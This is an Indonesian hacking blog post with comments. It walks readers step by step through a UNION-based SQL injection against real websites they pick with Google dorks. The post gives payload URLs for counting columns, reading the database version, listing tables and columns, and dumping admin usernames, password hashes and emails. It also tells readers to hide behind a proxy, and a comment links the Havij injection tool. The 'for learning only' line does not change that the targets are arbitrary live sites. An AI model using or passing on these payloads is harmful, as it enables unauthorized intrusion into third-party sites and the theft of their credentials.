Linux Wejib

SQL 5 injection (Sharing Pengalaman)


setelah beberapa hari belajar "SQL Injection"
akhirnya bisa juga dikit-dikit, ayo yang mau coba nich ada step-stepnya


+++[ STEP I ]+++++++++++++++++++++++++++++++
Cari Target

pergi ke google dot com dan ketikkan:

allinurl:"***.php?" site:.....

*** <--target (misal index.php, news.php, berita.php)
.....
<--lokasi (misal id;Indonesia, my:Malaysia, il:Israel)


contohnya:

allinurl:"news.php?id=" site:my

sekarang pilih salah satu target yang ditampilkan dari hasil pencarian Google


+++[ STEP II ]++++++++++++++++++++++++++++++
Check VULN ato Gak

untuk ngecheck target VULN ato gak, coba tambahkan (') atau (-)
contoh, kita dapet target dengan alamat:

/news.php?id=5


nah sekarang coba kita tambahin karakter diatas, contoh;

/news.php?id=5'

atau

/news.php?id=-5

jika muncul pesan error, maka lanjutkan ke step berikutnya


+++[ STEP III ]+++++++++++++++++++++++++++++
Cari Informasi Jumlah Colom dalam Table

sekarang waktunya berhitung, ini dimaksud untuk mencari jumlah colom yang ada dalam table, tambahkan perintah:

+order+by+1-- <-- di paling akhir


contohnya:

/news.php?id=-5+order+by+1--

ganti angka 1 ke 2,3 dan seterusnya hingga ada pesan error, contoh:

/news.php?id=-5+order+by+1-- (belum ada pesan error)
/news.php?id=-5+order+by+2-- (belum ada pesan error)
/news.php?id=-5+order+by+3-- (belum ada pesan error)
/news.php?id=-5+order+by+4-- (belum ada pesan error)
/news.php?id=-5+order+by+5-- (belum ada pesan error)
/news.php?id=-5+order+by+6-- (ada pesan error)

dalam kasus ini, dapat diambil kesimpulan bahwa jumlah tablenya hanya ada 5, lanjut ke step selanjutnya


+++[ STEP IV ]++++++++++++++++++++++++++++++
Check Versi SQL

setelah informasi jumlah tablenya kita dapatkan, sekarang ganti:

+order+by+5--
menjadi:
+union+all+select+1,2,3,4,5--

maka menjadi:

/news.php?id=-5+union+all+select+1,2,3,4,5--

perhatikan angka yang ditampilkan, misal angka yang ditampilkan adalah:

5
3
2

dalam kasus ini ada tiga angka (5,3 dan 2) yang bisa kita gunakan untuk mencari informasi database lebih lanjut, ganti salah satu angka dari tiga angka yang ditampilkan (5,3 dan 2) dengan perintah:

version()
@@version

contoh:

/news.php?id=-5+union+all+select+1,2,3,4,version()--
/news.php?id=-5+union+all+select+1,2,version(),4,5--
/news.php?id=-5+union+all+select+1,version(),3,4,5--

perhatikan pesan yang ditampilkan, jika versi mysql > 5.x.x.x.x itu artinya kita bisa lanjut pada step selanjutnya, jika masih 4.x.x.x.x, silahkan lihat disini ato googling aja
* maklum wa sendiri juga belum ngerti, wakakakakaka
* di step ini sering gagal karena sebagian webmaster sudah menfilter perintah union hingga akhirnya tidak bisa dieksekusi...


+++[ STEP V ]+++++++++++++++++++++++++++++++
Cari Informasi Nama Table

di step ini kita akan mencari informasi daftar nama table yang ada pada database, caranya ganti perintah:

version() ke --> "group_concat(table_name)"

kemudian tambahkan perintah:

+from+information_schema.tables+where+table_schema=database()
(di depan karakter "--" di paling akhir)

misal version() tadi di angka 2, maka menjadi seperti ini

/news.php?id=-5+union+all+select+1,group_concat(table_name),3,4, 5+from+information_schema.tables+where+table_schema =database()--

sekarang perhatikan apa yang tampil, semua nama table di tampilkan dengan pemisah karakter "," misal yang ditampilkan:

(admin,berita,artikel,guestbook,counter)

berarti databasenya memilikita table;

- admin
- berita
- artikel
- guestbook
- counter
untuk menyimpan data dari administrasi website tersebut.


sekarang kita lanjut ke step berikut


+++[ STEP VI ]++++++++++++++++++++++++++++++
Cari informasi Nama Colom dari Table

dalam hal ini kita harus menggunakan tool konversi "TEXT" ke "HEXA"
atau kita bisa menggunakan web ini
dalam kasus ini misal kita ingin mengetahui daftar "nama colom" yang ada pada table "admin" maka kita harus mengonversi kata (admin) ke HEXA, setelah kita memperoleh hasil konversinya misal hasilnya;

61 64 6D 69 6E

maka tambahkan "0x" di awal HEXA, hingga jadi seperti ini:

0x61646D696E

dan ganti perintah;

group_concat(table_name)
menjadi:
group_concat(column_name)

ganti juga perintah:

+from+information_schema.tables+where+table_schema=database()
menjadi:
+from+information_schema.columns+where+table_name =0x61646D696E

hingga jadinya seperti ini:

/news.php?id=-5+union+all+select+1,group_concat(column_name) ,3,4,5+from+information_schema.columns+where+table_name =0x61646D696E--

sekarang semua nama colom dalam table admin ditampilkan dengan pemisah karakter "," misal:

(id,username,password,email)


lanjut.....


+++[ STEP VII ]+++++++++++++++++++++++++++++++
Cari Informasi Isi Colom

setelah kita dapat semua informasi table dan colom yang terdapat dalam table, maka sekarang kita akan menampilkan isi record yang tersimpan dalam colom, dalam hal ini kita akan menampilkan semua isi colom "username", "password" dan email dari table admin.

sekarang kita ganti perintah:

group_concat(column_name)
menjadi:
group_concat(0x3a,username,0x3a,password,0x3a,email)
* "0x3a" <-- pemisah yang nantinya menampilkan karakter ":"

kemudian ganti perintah:

+from+information_schema.columns+where+table_name =0x61646D696E
menjadi:
+from+admin

hingga jadinya seperti ini:

/news.php?id=-5+union+all+select+1,group_concat(0x3a,username, 0x3a,password,0x3a,email),3,4,5+from+admin--

misal yang tampil:

(:administrator:5f868wf56r46s4586d126s58f6fe6w4a5:email@ gmail.com:....

kesimpulannya yaitu, kita sudah dapet data admin untuk login ke system

username : administrator
password : 5f868wf56r46s4586d126s58f6fe6w4a5
^--- pass hash ini di encrypt dulu
email : email@gmail.com



____________________________________ selesai dech tinggal
- cari login adminnya
- trus masukin username dan pass ( yang telah di encrypt)

=======================================
* STEP-STEP NICH CUMA UNTUK PEMBELAJARAN
* disarankan menggunakan proxy untuk privasi IP komputer kita
* Semua Resiko dari penyalahgunaan ditanggung sendiri
* hehehe semoga sukses :D :D :D :D
* ___________________________ by 4dyP0d4y

6 Bhek Rembheg:

4dyP0d4y

correct....

Unknown

gan klo gak muncul pesan erorr pada STEP II Check VULN ato Gak... ginama tu gan mf sy newbie....

4dyP0d4y

kan pon bede gember icon wortel e attas...
otabe e ka'dintoh:
http://www.4shared.com/file/5DNYkhgT/Havij_SQL-Blind-Inject_Admin-F.html

zuhdi ali

mator sekalangkong seh eparengen oneng...

zuhdi ali

tretan,lastarennah epundhut lebet alamat seh eparengen dikah,nyo'on pass tretan.kadi napah...?nyo'on petodu...
salam

Anonim

kakak klo bisa tambahn gambarnya, aq msh bngung, amap nubie aq

Posting Komentar

 
Copyright © Dhisah Linux
Design by
4dyP0d4y